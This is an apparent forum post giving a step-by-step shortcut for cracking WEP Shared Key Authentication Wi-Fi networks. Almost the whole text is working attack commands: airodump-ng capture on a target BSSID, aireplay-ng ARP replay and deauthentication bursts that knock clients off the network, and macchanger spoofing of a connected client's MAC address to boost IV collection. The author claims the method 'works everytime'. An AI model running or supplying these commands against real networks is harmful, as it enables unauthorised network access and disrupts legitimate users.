We are running into WEP SKA more and more. Aircrack-ng has a long involved procedure for ska. Before you use this procedure try this shortcut.
Start airodump-ng
airodump-ng -c 1 --bssid TA:RG:ET:MA:CO:DE -w filename mon0
Start aireplay -3
aireplay-ng -3 -x 150 -b TA:RG:ET:MA:CO:DE mon0
Send a few deauth bursts
aireplay-ng -0 10 -a TA:RG:ET:MA:CO:DE mon0
Look to see if a client exists in the airodump-ng window?
If client present but you get low iv production and an occassional to constant death/dissassociation warnings in your aireplay-ng -3 window.
Try this:
Stop all processes listed above.
Change the mac of mon0 to that of the client present even if the client is sitting idle.
ifconfig mon0 down
macchanger -m CL:IE:NT:MA:CO:DE mon0
ifconfig mon0 up
Restart airodump-ng again
airodump-ng -c 1 --bssid TA:RG:ET:MA:CO:DE -w filename mon0
Retart aireplay -3
aireplay-ng -3 -x 150 -b TA:RG:ET:MA:CO:DE mon0
Send a few more deauth bursts
aireplay -0 10 -a TA:RG:ET:MA:CO:DE mon0
Usually iv production just takes off. If this doesnot work then wait for a different client or try the aircrack-ng approach.
Furthermore in WEP open systems, if you run up your ivs to around 500 and then start getting deauth/dissassociation warning in the aireplay-ng -3 attack window use the same technique of spoofing the mac of the client and restart the attack. For us it works everytime.
MTA